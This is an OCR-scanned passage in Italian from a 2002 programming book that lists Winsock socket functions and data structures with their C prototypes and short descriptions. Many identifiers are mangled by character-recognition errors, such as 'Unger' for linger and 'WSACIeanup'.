Esegue un synchronous I/O multiplexing. 
Invia dei dati ad un socket 

Invia dei dati a uno dei socket connesso o nonconnesso. 

Salva le opzioni associate al socket specificato. 

Esegue lo Shut down di una connessione full-duplex. 

Crea un punto terminale per una comunicazione e restituisce il desrittore 

del socket. 



Quelle invece di Micrsoft sono le seguenti : 
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WSAAccept()* 

WSAAsyncGetHostByAddr()"" 

WSAAsyncGetHostByName()°°** 

WSAAsyncGetProtoByName()°°" 

WSAAsyncGetProtoByNumberO" 

WSAAsyncGetServByNameQ°°" 

WSAAsyncGetServByPort()"" 

WSAAsyncSelectO" 

WSACancelAsyncRequest()°°" 

WSACIeanup() 

WSACIoseEvent() 

WSAConnectO* 

WSACreateEvent() 

WSADuplicateSocketO 

WSAEnumNetworkEventsO 
WSAEnumProtocols() 

WSAEventSelect() 
WSAGetLastErrorO** 
WSAGetOverlappedResult() 
WSAGetQOSByName() 

WSAHtonl() 

WSAHtons() 

WSA!octl()* 

WSAJoinLeaf()* 

WSANtohl() 

WSANtohsO 

WSAProviderConfigChange() 
WSARecvQ* 



WSARecvFromQ* 



WSAResetEvent() 
WSASendO* 

WSASendToO* 

WSASetEvent() 
WSASetLastError()* 

WSASocket() 



Una versione estesa di accept() la quale permette un 
accettazione condizionale e la creazione di gruppi. 
Un gruppo di funzioni relative a quelle standard di 
Berkeley elaborate per la gestione delle funzioni 
asincrone. 



WSAStartuc 



Esegue il Sign off dalle WinSock DLL. 
Distrugge un oggetto Event 
Una versione estesa della Connect() 
Crea un oggetto evento 

Allow an underlying socket to be shared by creating a 
virtual socket. 

Discover occurrences of network events. 
Retrieve information about each available protocol. 

Associate network events with an event object. 

Obtain details of last WinSock error 

Get completion status of overlapped operation. 

Supply QOS parameters based on a well-known 

service name. 

Extended version of htonl() 

Extended version of htons() 

Overlapped-capable version of ioctl() 

Add a multipoint leaf to a multipoint session 

Extended version of ntohl() 

Extended version of ntohs() 

Receive notifications of service providers being 

installed/removed. 

An extended version of recv() which accommodates 
scatte r/gath e r I/O, overlapped sockets and provides the 
flags parameter as IN OUT 
An extended version of recvfrom() which 
accommodates scatte r/gath e r I/O, overlapped sockets 
and provides the flags parameter as IN OUT 
Resets an event object. 

An extended version of send() which accommodates 

scatte r/gath e r I/O and overlapped sockets 

An extended version of sendto() which accommodates 

scatte r/gath e r I/O and overlapped sockets 

Sets an event object. 

Set the error to be returned by a subsequent 
WSAGetLastErrorO 

An extended version of socket() which takes a 

WSAPROTOCOLJNFO struct as input and allows 

overlapped sockets to be created. Also allows socket 

groups to be formed. 

Initialize the underlying WinSock DLL. 

Blocks on multiple event objects. 



I programmi utilizzanti tali funzioni potrebbero essere viste semplicemente da un punto di 
vista logico e quindi indipendentemente dal sistema operativo su cui vengono usate 
l'adattamento dei programmi è in genere una cosa abbastanza semplice. 
Nei listati visti in questo volume molti utilizzano le funzioni socket in ambiente Unix mentre 
altre lo fanno in ambiente Windows. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



In quest'ultimo ambiente esistono alcune estensioni che sono mostrate all'interno degli helps 
legati ai vari SDK rilasciati da Microsoft. 

Definizione di Socket 

Un socket è un punto terminale di una comunicazione — un oggetto attraverso il quale le 
applicazioni Windows Sockets inviano e ricevono pacchetti di dati attraverso una rete. 
Un socket possiede una tipologia e viene associato ad un processo in esecuzione, ed 
eventualmente può possedere anche un nome. 

Attualmente, I socket in senso generico scambiano dati soltanto con altri sockets nello stesso 

"dominio di comunicazione" il quale usa un certo gruppo di protocolli Internet. 

Tutti i tipi di sockets sono bidirezionali: in pratica sono flussi di dati che possono comunicare 

in tutte le direzioni simultaneamente (full-duplex). 

Sono disponibili due tipi di socket: 

Stream sockets 

Gli Stream sockets vengono utilizzati per I flussi di dati senza delimitazione dei records — 
uno stream di bytes. 

Datagram sockets 

I Datagram sockets supportano un flusso di dati orientato al record. 

Sotto alcuni protocolli TCP/IP gli streams asono streams di byte. I sockets Windows 
forniscono un livello di astrazione indipendente dal protocollo sottostante. 

Tipi di dati dei SOCKET 

Ogni oggetto relativo a un socket MFC incapsula un handle ad un socket Windows. 

II tipo dei dati di questo handle è SOCKET. 

Un handle SOCKET è analogo agli handle HWND usate nelle Windows 

I socket MFC forniscono una serie di operazioni legate all'handle incapsulato. 

II tipo di dati SOCKET è descritto in dettaglio nel Win32 SDK. 

Ho deciso di inserire per esteso queste strutture in quanto il loro utilizzo con le varie funzioni 
sono d'importanza vitale per quanto riguarda quello che potrebbe essere interessante durante 
la varie attività svolte dall'hacker mediante l'uso delle funzioni Winsock. 
Quelle che seguono sono le strutture utilizzate da WINSOCK. 

• AFPROTOCOLS 

• BLOB 

• CSADDR_ INFO 

• fd_set 

• FLOWSPEC 

• hostent 

• in_addr 

• Unger 

• NS_SERVICE_INFO 

• PROTOCOL_INFO 

• protoent 

• QOS 

• servent 

• SERVICE_ADDRESS 

• SERVICE_ADDRESSES 

• SERVICE_INFO 

• SERVICE_ TYPE_ INFO_ABS 

• SERVICE_TYPE_VALUE_ABS 

• sockaddr 
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• SOCKADDR_IRDA 

• SOCKET_ADDRESS 

• timeval 

• TRANSMIT_FILE_BUFFERS 

• WSABUF 

• WSADATA 

• WSANAMESPACE_ INFO 

• WSANETWORKEVENTS 

• WSAOVERLAPPED 

• WSAPROTOCOL_INFO 

• WSAPROTOCOLCHAIN 

• WSAQuerySet 

• WSASERVICECLASSINFO 

• WSATHREADID 

Le strutture viste ad una ad una possiedono I seguenti membri. 



AFPROTOCOLS 



Ls truttura AFPROTOCOLS fornisce una lista di protocolli con la quale il programmatore può 
forzare delle query. 

typedef struct _AFPROTOCOLS { 

INT lAddre s sFami ly ; 

INT IProtocol ; 
} AFPROTOCOLS, *PAFPROTOCOLS , * LP AFPROTOCOLS ; 



BLOB 



La struttura BLOB , deriva dai Binary Large Object, contiene informazioni su un blocco di 
dati. 

typedef struct _BLOB { 

ULONG cbSize ; 

BYTE *pBlobData; 
} BLOB; 



CSADDR INFO 



La struttura CSADDRJNFO contiene le informazioni legate agli indirizzi dei servizi di rete e il 
nome del provider. La funzione GetAddressByName ottiene la informazioni legate agli 
indirizzi Windows Sockets usando la struttura CSADDRJNFO. 

typedef struct _CSADDR_INFO { 

SOCKET_ADDRESS LocalAddr ; 

SOCKET_ADDRESS RemoteAddr ; 

INT ISocketType ; 

INT IProtocol ; 
} CSADDR_ INFO; 



fd set 



La struttura fd_set viene usata in diverse funzioni Windows Sockets, come ad esempio quella 
select , per inserire sockets all'interno di un "set" per diversi scopi, comre ad esempio 
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testare un determinato sokcet per la leggibilità usando il parametro readfds della fnzione 
select. 



typedef struct fd_set { 




u_int fd_count; 


// how many ars SET? 


SOCKET fd_array [FD_SETSIZE] ; 


// an array of SOCKETs 


} fd_set; 





in addr 



La struttura in_addr rappresenta un host attraverso il suo indirizzo internet. 



struct in_ 


addr { 










union { 














struct 


{ 


u_char s_bl, s_b2, s_b3, s_b4; } 


S_ 


un_b; 




struct 


{ 


u_short s_wl,s_w2; } 


S_ 


un_w; 




u_long 






S_ 


addr; 


} S_un; 












}; 













Unger 



La struttura Unger mantiene le informazioni legate ad uno specifico socket che dice inoltre 
come quesyo deve comportatrsi quando dei dati vengono accodati per essere spediti e la 
funzione closesocket viee chiamata con il socket. 

struct Unger { 

u_short l_onoff ; 
u_ short l_linger ; 



NS SERVICE INFO 



La struttura NS_SERVICE_INFO contiene le informazioni sui servizi di rete o ai servizi di rete 
specifici di un determinato contesto di un namespace. 

typedef struct _NS_SERVICE_INFO { 
DWORD dwNameSpa ce ; 

SERVICE_INFO Servicelnfo; 



PROTOCOL, 


INFO 


La struttura che contiene le informazioni del protocollo è la PROTOCOLJNFO. 


typedef struct _PROTOCOL_INFO { 


DWORD 


dwServi ceFlags ; 


INT 


i Addr e s sFami ly; 


INT 


IMaxSockAddr ; 


INT 


iMinSockAddr ; 


INT 


iSocketType ; 


INT 


iProtocol; 


DWORD 


dwMessageSize ; 


LPTSTR 


IpProtocol; 


} PROTOCOL 


_INFO; 
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protoent 



Questa struttura protent contiene il nome e il numero del protocollo che corrisponde al nome 
protocollo. Le applicazioni non devono mai cercare di modificare queste informazioni. 

struct protoent { 

char FAR * p_name; 

char FAR * FAR * p_aliases ; 

short p _proto ; 

}; 



servent 



La struttura servent è usata per salvare o restituire il nomne e il numero del servizio per un 
determinato nome servizio. 



struct servent { 




char FAR * 


s_name; 


char FAR * FAR * 


s_aliases; 


short 


s_port; 


char FAR * 


s_proto; 


ì; 





SERVICE ADDRESS 



La struttura SERVICE_ADDRESS contiene le informazioni legate agli indirizzi di un servzio. 
La struttura può accomodare molti tipi di meccanismi d'interprocesso (IPC) e le loro forme 
d'indirizzi, incluse le loro remote procedure calls (RPC), named pipes, e sockets. 



typedef 


struct _SERVICE_ADDRESS { 




DWORD 


dwAddressType ; 




DWORD 


dwAddressFlags ; 




DWORD 


dwAddressLength ; 




DWORD 


dwPrincipalLength ; 




BYTE 


*lpAddress; 




BYTE 


* IpPrincipal ; 




} SERVICE_ADDRESS ; 





SERVICE ADDRESSES 



La struttura SERVICE ADDRESSES contiene un array di SERVICE ADDRESS data 
structures. 

typedef struct _SERVICE_ADDRESSES { 

DWORD dwAddressCount ; 

SERVI CE_ ADDRESS Addresses [1] ; 
} SERVICE_ADDRESSES ; 



SERVICE INFO 



La struttura SERVICEJNFO contiene le informazioni relative alla rete e ai servizi relativi ai 
servizi. 

typedef struct _SERVICE_INFO { 
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LPGUID 


IpServiceType ; 


LPTSTR 


IpServi ceName ; 


LPTSTR 


IpComment ; 


LPTSTR 


lpLocale; 


DWORD 


dwDi spi ayHin t ; 


DWORD 


dwVersion; 


DWORD 


dwTime; 


LPTSTR 


lpMachineName ; 


LPSERVICE_ADDRESSES IpServi ceAddress ; 


BLOB ServlceSpecificInfo; 


} SERVICE_ 


INFO; 



SERVICE TYPE INFO ABS 



SERVICE_TYPE_INFO_ABS contiene le informazioni sui tipi di servizi di rete. Potete usare 
la struttura SERVICE_TYPE_INFO_ABS per aggiungere un servizio di rete ad n name space. 



typedef struct 


_SERVICE_TYPE_INFO_ABS { 


LPTSTR 


lpTypeName ; 


DWORD 


dwValueCount ; 


SERVICE_ TYPE_ 


_ VALUE_ABS Values [1] ; 


} SERVICE_TYPE_ 


_INFO_ABS; 



SERVICE TYPE VALUE ABS 



La struttura SERVICE_TYPE_VALUE_ABS contiene le informazioni sul valore del tipo di 
network-service. Questa deve essere specifica di un determinato name space. 

typedef struct _SERVICE_TYPE_VALUE_ABS { 

DWORD dwNameSpa ce ; 

DWORD dwVa lue Type ; 

DWORD dwValueSize ; 

LPTSTR lpValueName ; 

PVOID lpValue ; 
} SERVICE_ TYPE_ VAL UE_ABS; 



sockaddr 



Questa struttura sockaddr varia a seconda del protocollo selezinato. A parte il parametro 
sa_family , il contenuto di sockaddr viene espresso nel network byte order. 

struct sockaddr { 

u_short sa_famlly; 
char sa_data [14] ; 

}; 



SOCKADDR IRDA 



La struttura SOCKADDRJRDA viene usatain congiunzione con le operazone eseguite con 
IrDA, definite dalla famiglia d'indirizzi definiti in AFJRDA. 

typedef struct _ SOCKADDR_ IRDA 
{ 
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u_short 


irdaAddressFamily; 


u_char 


IrdaDevicelD [4] ; 


char 


IrdaServicBName [25] ; 


} SOCKADDR_ IRDA , 


*PSOCKADDR_ IRDA , FAR *LPSOCKADDR_ IRDA ; 



SOCKET ADDRESS 



La struttura SOCKET_ADDRESS salva le informazioni specifiche dei protocolli. 

typedef struct _SOCKET_ADDRESS { 

LPSOCKADDR IpSockaddr ; 

INT ISockaddrLength ; 

} SOCKET_ADDRESS, *PSOCKET_ADDRESS ; 



timeval 



La struttura timeval viene usata per specificare il valore del tempo. 



struct 


timeval { 




long 


tv_sec; 


// seconds 


long 


tv_usec; 


// and microseconds 


}; 







TRANSMIT FILE BUFFERS 



TRANSMIT_FILE_BUFFERS specifica I dati che devono essere trasmessi prima e dopo il file 
dati durante una funzione TransmitFile legata al trasferimento dei files. 

typedef struct _TRANSMIT_FILE_BUFFERS { 

PVOID Head ; 

DWORD HeadLength ; 

PVOID Tali ; 

DWORD TailLength ; 
} TRANSMI T_FILE_B UFFERS ; 



WSABUF 



La struttura WSABUF abilita la creazione o la manipolazione dei buffers di dati 

typedef struct WSABUF { 

u_long len; 

char FAR * buf ; 
} WSABUF, FAR * LPWSABUF; 



WSADATA 



I membri di questa struttura sono: 
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typedef struct WSAData 


{ 


WORD 


wVersion; 


WORD 


wHighVersion ; 


char 


szDescription [WSADESCRIPTI0N_LEN+1] ; 


char 


szSystemStatus [WSASYS_STATUS_LEN+1] ; 


unsigned short 


IMaxSockets ; 


unsigned short 


IMaxUdpDg; 


char FAR * 


lpVendorlnfo; 


} WSADATA, *LP WS ADA TA ; 





WSANAM ESPACE INFO 



La strutrtura WSANAMESPACEINFO contiene tutte le informazioni legate alla registrazione 
per il provider del name space. 



typedef struct 


_WSANAMESPACE_INFO { 


GUID 


NSProvlderld; 


DWORD 


dwNameSpa ce ; 


BOOL 


fActive; 


DWORD 


dwVersion; 


LPTSTR 


lps zldentifier; 


} WSANAMESPACE_ 


INFO, *PWSANAMESPACE_INFO; 



WSANETWORKEVENTS 



WSANETWORKEVENTS è usata per salvare le informazioni interne dei sockets 
relativamente agli ebenti di rete. 

typedef struct _ WSANETWORKEVENTS { 

long INet workEven ts ; 

int iErrorCode [FD_MAX_EVENTS] ; 

} WSANETWORKEVENTS, *LPWSANETWORKEVENTS ; 



WSAOVERLAPPED 



La struttura WSAOVERLAPPED fornisce le informazioni fornite dalla fase di inizializzazione 
della comunicazione e dal suo seguente completamento. 



typedef struct 


_WSAOVERLAPPED { 


DWORD 


Internai; 


DWORD 


InternalHigh ; 


DWORD 


Offset; 


DWORD 


OffsetHigh; 


WSAEVENT 


hEvent ; 


} WSAOVERLAPPED, *LPWSAOVERLAPPED; 



WSAPROTOCOL INFO 



La struttura WSAPROTOCOLJNFO è usata per salvare o recuperare le informazioni legate 
ad un determinato protocollo. 

typedef struct _WSAPROTOCOL_INFO { 
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DWORD 


dwServiceFlagsl ; 


DWORD 


dwServi ceFlags2 ; 


DWORD 


dwServi ceFlags3 ; 


DWORD 


dwServiceFlags4 ; 


DWORD 


dwProviderFlags ; 


GUID 


Provi derld; 


DWORD 


dwCa tal ogEn t ryld ; 


WSAPROTOCOLCHAIN 


ProtocolChain ; 


int 


iVersion; 


int 


iAddre s sFami ly; 


int 


iMaxSockAddr ; 


int 


IMinSockAddr ; 


int 


iSocketType ; 


int 


iProtocol ; 


int 


iProtocolMaxOffset ; 


int 


iNet workByt eOrder ; 


int 


iSecurityScheme ; 


DWORD 


dwMessageSize ; 


DWORD 


dwProviderReserved ; 


TCHAR 


szProtocol [WSAPR0T0C0L_LEN+1] ; 


} WSAPROTOCOL_INFO, 


*LPWSAPROTOCOL_ INFO; 



WSAPROTOCOLCHAIN 



WSAPROTOCOLCHAIN contiene una lista di identificatori di Catalog Entry che 
comprendono la catena dei protocolli. 

typedef struct _WSAPROTOCOLCHAIN { 
int ChainLen ; 

DWORD ChainEntries [MAX_PROTOCOL_CHAIN] ; 
} WSAPROTOCOLCHAIN, *LPWSAPROTOCOLCHAIN; 



WSAQuerySet 



WSAQuerySet fornisce delle informazioni importanti relative al servizio specificato, inclusa la 
class ID, il service name , l'identificatore del name-space e le informazioni del protocollo. 



typedef struct 


_WSAQuerySet { 


DWORD 


dwSize; 


LPTSTR 


lps zServicelnstan ceName ; 


LPGUID 


IpServiceClassId; 


LPWSAVERSION 


lpVersion; 


LPTSTR 


lps z Common t ; 


DWORD 


dwNameSpa ce ; 


LPGUID 


lpNSProviderld; 


LPTSTR 


IpszContext; 


DWORD 


dwNumberOfProt ocols; 


LPAFPROTOCOLS 


lpafpProtocols ; 


LPTSTR 


lps zQuerySt ring ; 


DWORD 


dwNumberOfCsAddrs ; 


LPCSADDR_ INFO 


IpcsaBuffer; 


DWORD 


dwOutputFlags ; 


LPBLOB 


IpBlob; 


} WSAQUERYSET, 


*PWSAQUERYSETW; 
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AcceptEx 



Questa funzione AcceptEx acetta una nuova connessione, e quindi ritorna l'indirizzo locale e 
remoto. La funzione riceve anche il primo blocco di dati inviati dall'applicazione client 

BOOL AcceptEx ( 

SOCKET sListenSocket , 
SOCKET sAcceptSocket , 
PVOID IpOutputBuffer , 
DWORD dwRecelveDataLength , 
DWORD dwLocalAddressLength , 
DWORD dwRemoteAddressLength , 
LP DWORD lpdwBytesReceived , 
LPOVERLAPPED IpOverl apped 

); 



bind 



bind associa un indirizzo locale con un socket. 

int bind( 
SOCKET s, 

const struct sockaddr FAR * name , 
int namelen 

); 



closesocket 



closesocket chiude un socket aperto esistente. 

int closesocket ( 
SOCKET s 

); 



connect 



connect stabilisce una connessione con il socket specificato. 

int connect ( 
SOCKET s, 

const struct sockaddr FAR * name , 
int namelen 

); 



EnumProtocoIs 



Importante La funzione EnumProtocoIs è un estensione Microsoft a Windows Sockets 1.1. 
Questa funzione è obsoleta 

La funzione WSAEnumProtocoIs fornisce una funzione equivalente in Windows Sockets 2. 

La funzione EnumProtocoIs ottiene le informazioni legate ad un protocollo di rete specifico 
che è attivo sul locai host. 

INT EnumProtocoIs ( 

LPINT lpiProtocols , // pointer to array of protocol 
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LPVOID IpProtocolBuffer , 
LP DWORD lpdwBufferLength 



); 



// identifiers 

// pointer to buffer to receive protocol 
// Information 

// pointer to variable that specifies 
// the size of the receiving buffer 



Get Accept ExSockadd rs 



GetAcceptExSockaddrs esegue il parsing dei dati ottenuti dalla chiamata a AcceptEx e 
passa l'indirizzo locale ad un indirizzo remoto uasando laSOCKADDR.. 



VOID GetAcceptExSockaddrs ( 
PVOID IpOutputBuffer , 
DWORD dwReceiveDataLength , 
DWORD dwLocalAddressLength , 
DWORD dwRemoteAddressLength , 
LPSOCKADDR * LocalSockaddr , 
LPINT LocalSocka ddrLen gth , 
LPSOCKADDR * RemoteSockaddr , 
LPINT RemoteSockaddrLength 

); 



GetAddressByName 



Questa è una delle funzioni che troverete più frequentemente all'interno dei listati che 
utilizzano Winsock all'interno di questo volume. La funzione GetAddressByName interroga 
un name space, o setta un nome di default di un name spaces, nell'ordine per ottenere le 
informazioni legate all'indirizzo di rete per un determinato servzio. Questo processo è 
conosciuto come service name resolution. Un servizio di rete potrebbe usare una funzione 
per ottenere l'indirizzo locale che viene utilizzato dentro alle bind . 



INT GetAddressByName ( 

DWORD dwNameSpa ce , // name space to query for service address 

// information 
LPGUID IpServiceType , // the type of the service 
LPTSTR IpServi ceName , // the name of the service 

LPINT lpiProt ocols , // points to array of protocol identifiers 
DWORD dwRe solution , // set of bit flags that specify aspects of 

// name resolution 
LPSERVICE_ASYNC_INFO IpServi ceAsyncInfo , 

// reserved for future use, must be NULL 
LPVOID IpCsaddrBuffer , // points to buffer to receive address 

// information 

LPDWORD lpdwBufferLength , // points to variable with address 

// buffer size information 
LPTSTR lpAliasBuffer , // points to buffer to receive alias 

// information 
LPDWORD lpdwAliasBufferLength 

// points to variable with alias buffer 

// size information 



gethostbyaddr 



La funzione gethostbyaddr recupera le informazioni dell'host corrispondente ad un indirizzo 
di rete. Anche questa è una delle funzioni più usate dentro ai listati di questo volume. 
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struct HOSTENT FAR * gethostbyaddr ( 
const char FAR * addr , 
int len , 
int type 

); 



gethostbyname 



gethostbyname ecupera le informazioni dell'host corrispondente al nome dell'host all'interno 
del database host. 

struct hostent FAR * gethostbyname ( 
const char FAR *name 

); 



gethostname 



gethostname ritorna lo standard host name per la machina locale. 

int gethostname ( 
char FAR * name , 
int namelen 

); 



GetNameByType 



GetNameByType ottiene il nome del servizio di rete. 

INT GetNameByType ( 

LPGUID IpServiceType , // points to network service type GUID 
LPTSTR IpServi ceName , // points to buffer to receive name of 

// network service 
DWORD dwNameLength // points to variable that speci fies buffer 

// size 

); 



getpeername 



La funzione Windows Sockets getpeername recupera il nome del peer a cui il socket è 
connesso. 



int getpeername ( 
SOCKET s, 

struct sockaddr FAR * name , 
int FAR * namelen 

); 



getprotobyname 



getprotobyname legge le informazioni relative al protocollo con un certo nome. 

struct PROTOENT FAR * getprotobyname ( 
const char FAR *name 

); 
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getprotobynumber 



La funzione Windows Sockets getprotobynumber recupera le informazioni corrispondenti al 
protocollo identificato da un certo numero. 

struct PROTOENT FAR * getprotobynumber ( 
int number 

); 



getservbyname 



getservbyname recupera le informazioni legate al servzio ed al protocollo. 

struct servent FAR * getservbyname ( 
const char FAR * name , 
const char FAR * proto 

); 



getservbyport 



getservbyport recupera le informazioni relative al protocollo ed alla porta. 

struct servent FAR * getservbyport ( 
int port , 

const char FAR * proto 

); 



GetService 



GetService ottiene le informazioni relative ad un servzio di rete in un determinato contesto. Si 
tratta di una funzione obsoleta. Il servzio di rete è specificato tramite il suo nome. Le 
informazioni sono ottenute come set della struttura NS_SERVICE_INFO. 

INT GetService ( 

DWORD dwNameSpa ce , // specifies name space or spaces to search 
PGUID lpGuid , // points to a GUID service type 

LPTSTR IpServi ceName , 

// points to a service name 
DWORD dwPropert ies , // specifies service information to be 

// obtained 

LPVOID lpBuffer , // points to buffer to receive service 

// information 

LPDWORD lpdwBufferSize , // points to size of buffer, size of 

// service information 
LPSERVICE_ASYNC_INFO IpServi ceAsyncInfo 

// reserved for future use, must be NULL 

); 



getsockname 



getsockname recupera il nome locale di un socket. 

int getsockname ( 
SOCKET s, 

struct sockaddr FAR * name , 
int FAR *namelen 
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); 



getsockopt 



La funzione Windows Sockets getsockopt recupera le opzioni di un socket. 

int getsockopt ( 
SOCKET s, 
int level , 
int opinarne , 
char FAR * optval , 
int FAR * optlen 

)} 



GetTypeByName 



GetTypeByName ottiene il tipo del GUID del servizio per un servizio di rete specificato dal 
nome. 

INT GetTypeByName ( 

LPTSTR IpServi ceName , // points to the name of the network service 
PGUID IpServi ce Type // points to a variable to receive network 

// service type 

); 



htonl 



htonl converte un ujong dal host alla rete TCP/IP ordinato al byte 

u_long htonl ( 

u_long host long 

); 



htons 



htons converte un u_short dal host alla rete TCP/IP ordinata al byte. 

u_short htons ( 

u_ short host short 

); 



inet addr 



La funzione inet_addr converte una stringa contenente un indirizzo (Ipv4) Internet Protocol 
con pounti in un indirizzo contenuto dentro alla struttura IN_ADDR . 



unsigned long inet_addr ( 
const char FAR * cp 

); 



inet_ntoa 




inet_ntoa converte un indirizzo (Ipv4) in un for,mato d'indirizzo con punti. 




char FAR * inet_ntoa ( 
struct in_addr in 
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); 



ioctlsocket 



ioctlsocket controlla il modo di I/O di un socket. 

int ioctlsocket ( 
SOCKET s, 
long cmd , 
u_long FAR *argp 

); 



listen 



listen pone un socket mentre questo attende una connesione 

int listen ( 
SOCKET s, 
int backlog 

); 



ntohl 



ntohl converte un ujong dalla rete TCP/IP in numero host. 

u_long ntohl ( 
u_long net long 

); 



ntohs 



La funzione ntohs converteun u_short dalla rete TCP/IP ad host. 

u_short ntohs ( 
u_ short net short 

); 



recv 



recv riceve dati da un socket connesso. 

int recv( 
SOCKET s, 
char FAR * buf , 
int len , 
int flags 

); 



recvfrom 



recvfrom riceva un datagramma e salva l'indirizzo del sorgente. 

int recvfrom ( 
SOCKET s, 
char FAR* buf, 
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int len , 
int flags , 

struct sockaddr FAR * front , 
int FAR * fromlen 

); 



select 



La funzione select determina lostato di uno o di più sockets. 

int select ( 
int nfds , 

fd_set FAR * readfds , 

fd_set FAR *writefds, 

fd_set FAR * exceptfds , 

const struct timeval FAR *timeout 

); 



send 



send invia dei dati a un socket collegato, socket. 

int send( 
SOCKET s, 

const char FAR * buf , 
int len , 
int flags 

); 



sendto 



sendto invia dati ad una destinazione specifica, destination. 

int sendto ( 
SOCKET s, 

const char FAR * buf , 
int len , 
int flags , 

const struct sockaddr FAR *to, 
int tolen 

); 



SetService 



SetService registra o rimuove dal registro un servizio di rete con uno o più name spaces. LA 
funzione può anche aggiungere o rimuovere un servizio di rete. 

INT SetService ( 

DWORD dwNameSpa ce , // specifies name space (s) to operate within 

DWORD dwOpera tion , // specifies operation to perforai 

DWORD dwFlags , // set of bit flags that modify function 

// operation 
LPSERVICE_INFO IpServicelnfo , 

// points to structure containing service 

// Information 
LPSERVICE_ASYNC_INFO IpServi ceAsyncInfo , 

// reserved for future use, must be NULL 
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LP DWORD lpdwStatusFlags 

// points to set of status bit flags 

); 



setsockopt 



setsockopt setta le opzioni di un socket. 

int setsockopt ( 
SOCKET s, 
int level , 
int opinarne , 
const char FAR * optval , 
int optlen 

); 



shutdown 



shutdown disabilita l'invio o la ricezione su un socket. 

int shutdown ( 
SOCKET s, 
int how 

); 



socket 



socket crea un socket che gestisce un determinato service provider. 

SOCKET socket ( 
int af , 
int type , 
int protocol 

); 



TransmitFile 



TransmitFile transmette dati usando un handle di un socket. Questa funzione usa la chache 
del sistema operativo per recuperare I dati da file.. 

BOOL TransmitFile ( 
SOCKET hSocket , 
HANDLE hFile , 

DWORD nNumberOfByt es ToWri t e , 
DWORD nNumberOfByt esPerSen d , 
LPOVERLAPPED IpOverlapped , 

LP TRANSMI T_ FILE_B UFFERS lpTransmi tBuffers , 
DWORD dwFlags 

); 



WSAAccept 



WSAAccept condizionalmente accetta una connessione basata su un valore di ritorno da 
una funzione di valutazione. 

SOCKET WSAAccept ( 
SOCKET s, 
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struct sockaddr FAR * addr , 
LPINT addrlen , 

LPCONDITIONPROC lpfnCondition , 
DWORD dwCa liba ckDa t a 

); 



WSAAddressToString 



WSAAddressToString coverte tutti I componenti di una struttura SOCKADDR in una stringa 
comprensibile rappresentante l'indirizzo. 

INT WSAAddressToString ( 
LP SOCKADDR IpsaAddress , 
DWORD dwAddressLength , 
LPWSAPROTOCOL_INFO IpProt ocol Info , 
LPTSTR IpszAddressString , 
LP DWORD lpdwAddre ssStringLength 

); 



WSAAsyncGetHostByAddr 



WSAAsyncGetHostByAddr recupera le informazioni di un host corrispondente ad un 
determinato indirizzo. 

HANDLE WSAAsyncGetHostByAddr ( 
HWND hWnd , 
unsigned int wMsg , 
const char FAR * addr , 
int len , 
int type , 
char FAR * buf , 
int buflen 

); 



WSAAsyncGetHostByName 



WSAAsyncGetHostByName recupera in modo asincrono le informazioni di un host 
corrispondente al nome di questo. 

HANDLE WSAAsyncGetHostByName ( 
HWND hWnd , 
unsigned int wMsg , 
const char FAR * name , 
char FAR * buf , 
int buflen 

); 



WSAAsyncGetProtoByName 



WSAAsyncGetProtoByName esegue il get delle informazioni relative al nome del protocollo 
asincrono. 

HANDLE WSAAsyncGetProtoByName ( 
HWND hWnd , 
unsigned int wMsg , 
const char FAR * name , 
char FAR * buf , 
int buflen 
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); 



WSAAsyncGetProtoByNumber 



WSAAsyncGetProtoByNumber recupera le informazioni del protocollo corrispondente al 
numero. 

HANDLE WSAAsyncGetProtoByNumber ( 
HWND hWnd , 
unsigned int wMsg , 
int number, 
char FAR * buf , 
int buflen 

); 



WSAAsyncGetServByName 



WSAAsyncGetServByName recupera le informazioni corrispondrnti al servizo identificato da 
nome e della porta.. 

HANDLE WSAAsyncGetServByName ( 
HWND hWnd , 
unsigned int wMsg , 
const char FAR * name , 
const char FAR * proto , 
char FAR * buf , 
int buflen 

); 



WSAAsyncGetServByPort 



WSAAsyncGetServByPort riporta le informazioni corrispondenti alle porte e ai protocolli in 
modalità asincrona. 

HANDLE WSAAsyncGetServByPort ( 
HWND hWnd , 
unsigned int wMsg , 
int port , 

const char FAR * proto , 
char FAR * buf , 
int buflen 

); 



WSAAsyncSelect 



WSAAsyncSelect richiede il notificatore degli eventi basato sul sistema basato sui messaggi 
di Windows relativo alla rete. 

int WSAAsyncSelect ( 
SOCKET s, 
HWND hWnd , 
unsigned int wMsg , 
long lEvent 

); 
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WSACancelAsyncRequest 



WSACancelAsyncRequest cancella un operazione asincrona incompleta. 

int WSACancelAsyncRequest ( 
HANDLE hAsyn c Ta skHan die 

)} 



WSACancelBIockingCall 



WSACancelBIockingCall è stata rimossa in accordo con le specifiche Windows Sockets 2, 
revision 2.2.0. 



WSACleanup 



WSACleanup termina l'uso di Ws2_32.dll. 
Int WSACleanup (vold) ; 



WSACIoseEvent 



WSACIoseEvent chiude un event handler aperto. 

BOOL WSACIoseEvent ( 
WSAEVENT hEvent 

); 



WSAConnect 



La funzione WSAConnect stabilisce una connessione con un altra papplicazione socket, 
scambia i dati, e specifica la quality of service necessario basandosi sulla struttura 
FLOWSPEC. 

Int WSAConnect ( 
SOCKET s, 

const struct sockaddr FAR * name , 

int namelen , 

LPWSABUF IpCallerData , 

LPWSABUF IpCalleeData , 

LPQOS IpSQOS , 

LPQOS lpGQOS 

); 



WSACreateEvent 



WSACreateEvent crea un nuovo oggetto indirizzato alla gestione degli eventi. 
WSAEVENT WSACreateEvent (void) ; 
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WSADuplicateSocket 



WSADuplicateSocket ritorna una struttura WSAPROTOCOLJNFO che può essere 
usata per creare un nuovo descrittore socket per. 

WSADuplicateSocket non può essere usata su un socket abilitato a QOS. 



int WSADuplicateSocket ( 
SOCKET s, 

DWORD dwProcessId , 

LPWSAPROTOCOL_INFO IpProt ocol Info 

); 



WSAEnumNameSpaceProviders 



WSAEnumNameSpaceProviders recupera le informazioni sui name spaces disponibili. 

INT WSAAPI WSAEnumNameSpaceProviders ( 
LPDWORD lpdwBufferLength , 
LP WSANAMESPACE_ INFO IpnspBuffer 

); 



WSAEnumNetworkEvents 



WSAEnumNetworkEvents scopre le occorrenze degli eventi di rete relative ai socket 
specificati, cancella la registrazione interna degli eventi, e resetta gli oggetti eventi.. 

int WSAEnumNetworkEvents ( 
SOCKET s, 

WSAEVENT hEventObject , 
LPWSANETWORKEVENTS IpNetworkEvents 

)} 



WSAEnumProtocoIs 



WSAEnumProtocoIs recupera le informazioni legate ai protocolli di trasporto. 

int WSAEnumProtocoIs ( 
